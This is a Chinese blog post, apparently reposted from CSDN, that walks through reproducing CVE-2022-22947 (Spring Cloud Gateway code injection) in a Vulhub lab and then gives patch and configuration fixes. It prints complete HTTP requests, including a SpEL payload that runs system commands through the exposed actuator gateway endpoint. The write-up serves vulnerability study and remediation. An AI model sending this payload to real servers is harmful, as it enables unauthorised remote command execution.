• CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议


    原文出处:

    CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议_爱吃橙子的羊的博客-CSDN博客

    CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
    本文仅为验证漏洞,在本地环境测试验证,无其它目的

    CVE 编号:
    CVE-2022-22947

    漏洞说明:
    2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。

    漏洞影响范围:
    Spring Cloud Gateway 3.1.x < 3.1.1
    Spring Cloud Gateway 3.0.x < 3.0.7
    旧的、不受支持的版本也会受到影响
    漏洞级别:
    高危

    利用条件:
    参考:长亭安全课堂

    除了Spring Cloud Gateway 外,程序还用到了 Spring Boot Actuator 组件(它用于对外提供 /actuator/ 接口);
    Spring 配置对外暴露 gateway 接口,如 application.properties 配置为:
    # 默认为true
    management.endpoint.gateway.enabled=true

    # 以逗号分隔的一系列值,默认为 health
    # 若包含 gateway 即表示对外提供 Spring Cloud Gateway 接口
    management.endpoints.web.exposure.include=gateway
    1
    2
    3
    4
    5
    6
    漏洞复现:
    本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场(自行百度,如有问题可以沟通交流,后期时间充足可以再出Vulhub搭建教程),需注意将请求中的代码更换为靶机所在IP
    (参考:Vulhub/CVE-2022-22947)

    进入靶场环境:【Vulhub}-【Spring】-【CVE-2022-22947】
    请添加图片描述

    启动服务:

    docker-compose up -d

     请添加图片描述

    访问靶场服务器IP+端口:http://192.168.32.130:8080

    请添加图片描述 

     此处要注意,因为靶场会占用8080端口,所以当BP和靶场在统一环境下时,注意修改BP的8080端口为其他,并在浏览器中进行更新才能访问靶场环境

    构造包含恶意请求的路由,利用BP进行发送:(图中标出的执行参数,更换id为whoami等可进行验证)


     

    1. POST /actuator/gateway/routes/hacktest HTTP/1.1
    2. Host: 192.168.32.130:8080
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like         Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close
    8. Content-Type: application/json
    9. Content-Length: 329
    10. {
    11.   "id": "hacktest",
    12.  "filters": [{
    13. "name": "AddResponseHeader",
    14. "args": {
    15.   "name": "Result",
    16.   "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    17. }
    18.   }],
    19.   "uri": "http://example.com"
    20. }


    然后应用刚添加的路由发送如下数据包,此数据包会触发表达式执行:
     

    1. POST /actuator/gateway/refresh HTTP/1.1
    2. Host: 192.168.32.130:8080
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close
    8. Content-Type: application/x-www-form-urlencoded
    9. Content-Length: 0

    请添加图片描述

     7、发送如下数据包可查看结果:

    1. GET /actuator/gateway/routes/hacktest HTTP/1.1
    2. Host: 192.168.32.130:8080
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close
    8. Content-Type: application/x-www-form-urlencoded
    9. Content-Length: 0

    请添加图片描述

    8.最后发送如下数据包进行清理,删除所添加的路由:

    1. DELETE /actuator/gateway/routes/hacktest HTTP/1.1
    2. Host: 192.168.32.130:8080
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close

     请添加图片描述

    9.再次刷新路由 

    1. POST /actuator/gateway/refresh HTTP/1.1
    2. Host: 192.168.32.130:8080
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close
    8. Content-Type: application/x-www-form-urlencoded
    9. Content-Length: 0

    请添加图片描述

    10.以上漏洞环境使用完成后,使用以下命令进行环境移除

    docker-compose down
    如果不会搭建Vulhub本地靶场,可利用VulFOCUS在线靶场,进行注册后在线使用,有问题可以交流

    漏洞修复:

    临时解决方案
    如果不需要Actuator端点,可以通过management.endpoint.gateway.enable:false配置将其禁用

    如果需要Actuator端点,则应使用Spring Security对其进行保护。

    官方升级补丁

    3.1.x版本用户及时升级到3.1.1+

    3.0.x版本用户及时升级到3.0.7+
     

     

  • 相关阅读:
    Cloud Keys Delphi Edition安全地存储
    【基于pyAudioKits的Python音频信号处理项目(二)】深度学习语音识别
    云计算场景下,如何快速定位出虚拟机reboot/shutdown引发的故障
    macOS下 /etc/hosts 文件权限问题修复方案
    LeetCode 1038.从二叉搜索树到更大和树
    按键中断
    GCC编译器生成库文件并编译
    密码锁屏保护隐私更安全,这款口碑好的手机浏览器值得拥有
    果断收藏|项目中有哪些风险是难以避免的?
    Java面试八股2000道,高频经典难题,实力解读(面试成功率达95%,涵盖Java全知识体系+Leetcode算法题+项目实战)
  • 原文地址:https://blog.csdn.net/weixin_57567655/article/details/125520510